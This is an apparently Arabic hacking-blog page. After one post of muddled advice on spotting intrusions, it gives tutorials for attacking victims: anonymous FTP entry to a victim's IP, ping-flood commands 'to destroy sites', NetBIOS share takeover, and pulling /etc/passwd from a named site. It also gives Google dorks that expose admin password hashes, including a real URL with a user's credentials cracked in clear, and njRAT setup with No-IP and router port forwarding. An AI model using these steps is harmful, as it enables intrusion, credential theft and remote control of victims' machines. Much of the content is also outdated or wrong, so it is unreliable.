حماية حاسوبك من الهكر

في البداية اود ان انوة ان الهكر لا يخترق عشوائيا انما العرب عقولهم فارغة اما ان يهكر من اجل ان يشتهر او يهكر من اجل اغراض لا اخلاقية فقانون الهكر اخلاق لا نهكر عشوائيا وانما نهكر من اجل غاية
الان ناتي كيف اعرف اني حاسوبي مهكر بكل بساطة الهكر لا يستطيع ان يهكرك بدون وجود خط انترنيت اذا فهو ياخذ جزء من الانترنيت وهنا تاتي طريقة كشف اذا كان حاسوبك مهكر ام لا فبواسطة برامج عديدة تفحص كل عملية اتصال بالانترنيت تجري بعلمك او بغير علمك في داخل حاسوبك فمن خلالة تستطيع ان تتعرف على شيئين ما الذي يتصل بالانترنيت وهلانت مخترق الان كشفنا عن الهكر اذا كيف سنوقفة فبواسطة نفس البرنامج تستطيع ان تقطع اتصال هذا السيرفر الموجود بحاسوبك او اي كان  فايروس او اي شيئ فينقطع الاتصال الهكر بحاسوبك لكن بقي امر ما لايزال السيرفر او الفايروس في الحاسوب اذا عند اغلاقي للحاسوب سيرجع الهكر بعد ان اعيد تشغيلة ما الحل
الحل بسيط فبعد ان كشفت عن الهكر في حاسوبك وقطعت الاتصال سيضهر لك اسم البرنامج او السيرفر او مهما كان هنا تستطيع ان تكشف موقع البرنامج وايقافة ثم مسحة عن طريق windows task manager توقف البرنامج وتجد موقعة وتمسحة فيصبح جهازك نظيف لكن كيف احمي نفسي من الا اخترق مرة اخرة
تستطيع ان تنصب برنامج مضاد للفيروسات =بشرط ن يكون جيد وان تحدثة باستمرار لان التشفيرات تجدد ولابد من تجديد البرنامج حتى يستطيع فتح التشفيرة والعثور على الهكر

ملاحظة :- ان برنامج قطع الاتصال عن الهكر يستطيع ان يغلق اي هكر يحاول الوصول الى حاسوبك لكن اذا كان الهكر يستخدم طريقة الدخول عبر الاي بي لن تستطيع منعة من الدخول مجدد لكن تستطيع ان تلغي الاتصال كلما حاول ان يهكر حاسوبك فيضهر لك تنبية يبين لك ان هناك اتصال جديد بالانترنيت مجهول المصدر علبر البرنامج الذي ثبتة في البداية ما طرق الهكر الاخرى عبرالسيرفر او الفايروسات المخبثة او اي شيئ يوضع بحاسوبك تستطيع ان تمحية تماما عبر Windows task manager

في النهاية اتمنى ان التحفضو اي صور عائلية او صور مهمة في الحاسوب ضعوها في هارد خارجي او رام او فلاش ميموري حتى عندما تخترقون لا يجد لهكر شي وانت تكون مرتاح البال

تابع القراءة »

اختراق جهاز حاسوب عن طريق الدوس CMD

كيفيه اختراق الكمبيوتر عن طريق CMD
ازاى و يا ترى ايه هو CMD ???
بنسميه الدوس هو عباره عن موجه اوامر خططى لنظام OS و هو الذى تمت صناعته من قبل شركتين معاً و هما مايكروسوفت و شركه اى بى ام
و نحن نقوم باستخدام البرنامج في تنفيذ بعض الاوامر مثل النسخ - تهيئة الاقراص - الحذف - ارسال اشارة للسيرفر - استعراض الملفات و غيرها من الامور .
المهم ندخل فى الموضوع
ازاى نخترق الجهاز عن طريق الدوس او command prompt(CMD)
أ- الادوات المطلوبه
1-اي بى الضحيه :
ما هو الاي بى ؟؟ الاي بي هو عنوان الكمبيوتر على الانترنت و مستحيل تلاقى جهازين بنفس الاي بى و من غيره متعرفش تخترق الجهاز الا عن طريق التروجان و برامج الاختراق
و خليني ابسطلكم المعنى اكتر الاى بي زى عنوان شفتك و بيكون منقسم لاربع اقسام
19.23.44.0

و طبعاً الارقام اللى بتبقى فى اخر بوينت اللى هى صفر هاي مش ثابته يعنى بتختلف من جهاز لجهاز
راح تكلي وشلون اجيبة راح اكلك
ارسلة (صوره - اغنيه - ملف وورد- دعوه مايك او كاميرا - الخ ...)
بعد ما يقبل منك اى شغلة من المذكورين بسرعه تعمل الاتى :
1- اضغط على اسارت
2- run
3- اكتب CMD
بكده تبقى ظهرتلك صفحه الدوس و تكتب فيها الامر ده netstat -n

حيظهرلك قائمتين فيهم اى بيهات الصف الشمال اى بى واحد زى بعض يعنى و ده الاى بى الخاص بجهازك انت
الصف التانى اى بيهات مختلفه اى بى الضحيه الى انت بعتلو الملف ده و قبل منك اخر واحد الاى بى للضحيه هيكون اخر اى بى على الصف الايمن
او تالت اى بى على الصف اليمين
المهم كده احنا جيبنا الاى بي
بعد كده علشان نقدر نخرق الجهاز لازم البورت رقم 21 يكون مفتوح
و هو البورت الخاص بـ FTP
و علشان تتأكد من ان البورت مفتوح فى برامح كويسه بتعهرفلك كل ده و منا اهمها Superscanne
المهم بعد ما اتأكدنا ان البورت مفتوح ندخل Start
ثم
Run
ثم اكتب
ftp –n
سوف تطلع لك نافدة في الدوس مكتوب عليها
FTP>
اكتب open 00.00.00.00
طبعاً مكان الاصفار بنحط رقم الاي بي مال جهاز الضحية
اذا جالك الرد ده Connected to http:
220 websrv1 Microsoft FTP Service (Version 4.0
اكتب quote user ftp
حيجيلك الرد ده Anonymous acces allowed, send identify (e-mail name) as password
اكتبquote cwd ~root
اذا جالك الرد ده 530 Please login with USER and PASS
اكتبله quote pass ftp
اذا جابلك الرد ده يبقى احنا كده اخترقنا الجهاز
وهيج خلصنا الدرس انظرونا في دروس جديدة

تابع القراءة »

طريقة اختراق المواقع عن طريق الدوسCMD

ارجو من الجميع التركيز والانتباة لان الموضوع سهل لكن يحتاج تركيز


اخطر واغرب الأوامر بالدوس للهكر:
لتدمير المواقع:
ping -t www.***.com
هذا الأمر يقوم بالضغط على المضيف
ping -t -a -f www.***.com
أماهذا الأمر الشاطر فيقوم باعطاء الاوامر للمستضيف
ping www.***.com
وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج "ping "بعدها الاي بي
com/com.wav
com3/com3/.wav
com1/com.wav
وهذه الاوامر للهجوم اكتب الموقع أوهذا الامر أو الاي بي يكون افضل
ping -w timeout www.***.com
وهذا الامر يستعمل لمعرفة سرعة المواقع
NETSTAT -S
هذه المنافذ في جهازك
NETSTAT -A
هذا الامر لترىالمنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
NETSTAT -N
هذا الامر لأخراج الاي بي ارسل اي ملف لمن معك على الماسنجر وهو يحمل اكتبه سيأتيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
NETSTAT -P
هذا منافذ البروتكوكل
drwatson
هذا الامر لأخفاء الاي بي
والان هذه اوامر خطيرة
الإختراق عن طريق NetBios Attack
هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : أحصل على IP الخاص بجهازك بواسطة هذا البرنامج الصغير ."NetBios Attack"
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).

2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .

3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .

4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .

5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.

6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\<insert ip_address here>

7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\<insert IP address here>\temp
طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
User name-Password
وهما يكونان محفوظين في ملف يسمي
PASSWD غالبا
بعض المواقع تضع هذا الملف في الإف تي بي
ما هو إف تي بي؟
FTP=File Transfer Protocol بروتوكول نقل الملفات
تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
start==>run إبدأ ثم تشغيل
واكتب telnet
سيفتح التلنت اضغط علىRemote System ==> connect
ثم اكتب الموقع في Host Name مثلا
kahane.org أو الآيبي الخاص به
وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي
ثم اضغط connect
وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
user anonymous
ثم انتر بعدها يطلب السيرفر كلمة السر اكتب
passtttttttt@yahoo.com
اكتب أي بريد ككلمة سر وطبعا سيكون وهميا
ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
بعدها سنحصل على ملف الباسوورد
قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
cute ftp - ws_ftp
مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
ftp.kahane.org
لتحصل على الملف في التلنت اكتب
retr /etc/passwd
/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd
وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها::
-------------------------------------
في ملاحظة الكل الان يمكن قاعد يدور عليها وهي كالتالي
=== كيف اطلع ip الخاص فيني ====
اقلك كيف الطريقة اسهل من السهل === ادخل الدوس واكتب الامر التال(ipconfig)
راح يطلعلك معلومات كتيره ومن ضمنها هالمعلومه هي ( IPv4 Address. . . . . . . . . . . : 192.***.*.3)
اتمنى ان تكونو استفدتم من هذا الموضوع وانتضرونا في مواضيع جديدة

تابع القراءة »

اختراق المواقع باسهل الثغرات gallery2/login.txt

اليوم معنا ثغرة سهلة وجميلة جدا جدا

من مستوى المبتدئين

اي لا تحتاج خبرة

بسم الله نبداء

الثغرة تتيح لك استخراج

password المدير

المتطلبات

اولا

الدورك :
inurl:gallery2/login.txt
استخدمه للبحث في google

سوف تجد كثير من المواقع اختراي واحد منها

افتح الموقع الذي تريد ستجد كلمة سر المدير لكن مشفر

الان ستجد الباسورد ولاكن مشفر استخدم الموقع التالي لفك التشفير

http://isoftwarez.com/scanner/cracker

الان حصلنا على الباس ما هو النيم

النيم غالبا يكون
admin
او اسم الموقع

والان دور لوحة التحكم اقول لك سهلة ايضا طلعها من هنا
http://isoftwarez.com/scanner/admin/?

ومبرروك عليك الموقع

تابع القراءة »

اسهل طريقة لفتح بورت في الراوتر مع ضمان وصول التبليغ

سلام عليكم اليوم راح نتعلم كيفية فتح بورت في الراوتر تابع الشرح سهل جدا

اولا فتح البورت في الراوتر
1 افتح اعدادات الراوتر واختر DHCP كما في الصورة
ستجد قائمة مشابهة لهذه القائمة

بعد ذالك اخترDHCP Clients List
وابحث عن اسم حاسوبك وانسخ الاي بي لاحظ الصورة

الان قم بفتح Forwarding
واختر Virtual Servers

ثم اضف بورت جديد واكتب فية البورت الذي تريدة لاحظ

اخر شي افتح DMZ لاحظ الصورة

تمام هسة خلصنا من فتح البورت في الراوتر هسة راح يوصل التبليغ الداخلي والخارجي




 

تابع القراءة »

اختراق الحاسبة عن طريق برنامج NjRAT

اختراق الحاسبة عن طريق نجرات
اول شي لازم تعرف كيفية عمل برنامج نجرات
 البرنامج باختصار يعملى على انشاء سيرفر يفتح بورت(منفذ) في الحاسبة انت تحدد قيمتة مثلا بورت نجرات الاعتيادي (1177) يمكنك تغير هذا البورت الى اي بورت يعجبك شرط ان يكون بين (1) و(65534)
وانشاء حساب في برنامج النو اي بي (No-IP)  وسنشرح كيفية عمل هذا الحساب وكيفية تحميل وتشغيل برنامج نجرات
اولا قم بالدخول الى موقع (No-IP)
رابط الموقع
No-IP
طبعا التسجيل سهل ولا يحتاج شيئ اكتب اسمك ايميلك وما الي ذالك
وانشاء هوست خاص بك عند التسجيل بالموقع
ملاحظة:الهوست مجاني فقط للملحقة (biz) اما البقية (me),(com) وغيرها في غير مجانية
بعد اتمام التسجيل قم بتنزيل برنامج No-IP من موقع الشركة
http://www.noip.com/download?page=win

'طبعا تنصيب البرنامج سهل ايضا  نصبة وادخل معلومات التسجيل

هسة انتهينة من No-IP
نجي للنجرات
http://www.gulfup.com/?ytohOI

وهسة عدنة صور توضح كيفية عمل سيرفر في برنامج نجرات

 

هسة كل العليك تسوي تطي السيرفر للضحية وراح يجيك اتلبليغ  ولا تنسون تفتحون البورت بالراوتر او جدار الحماية
راجع درس فتح بورت في الراوتر او جدار الحماية

 

 

تابع القراءة »

اختراق المواقع عبر ثغرة Micro Login System v 1.0

السلام عليكم و رحمة الله تعالى و بركاته

اليوم سنشرح ثغرة اخرى بسيطة و سهلة

اذهب الى موقع البحث

google

اكتب هذه الجملة وهية ثغرة مصابة بها الكثير من المواقع

Micro Login System v 1.0

ستضهر لك مواقع كثيرة

انا على سبيل المثال وجدت

http://www.accessite.freeola.org/login/login.php

ندخل عليه نجد أنفسنا في لوحة التحكم

ههههههههه باقي اليوزور و الباسوورد

الان نحذف

login.php التي في أخر الرابط

ونضع مكانها

userpwd.txt

http://www.accessite.freeola.org/login/userpwd.txt

الان يخرج لنا اليوزر و الباس على شكل هاش

user:martin

password:da1771c415ae1e44e8a774f2e04fdffc

طيب بقى لنا الان نفك الهاش سهلة

نفكه من احد مواقع فك الهاشات

http://www.md5decrypter.co.uk/

و نفك الهاش

نرجع الى لوحة التحكم ونكتب اليوزو والباس الدي فككت له الهاش

http://www.accessite.freeola.org/login/login.php

user: martin

password: rovers

اتمنا يكون الشرح عجبكم

اي شي انة جاهز

Hussein.S.B.H

تابع القراءة »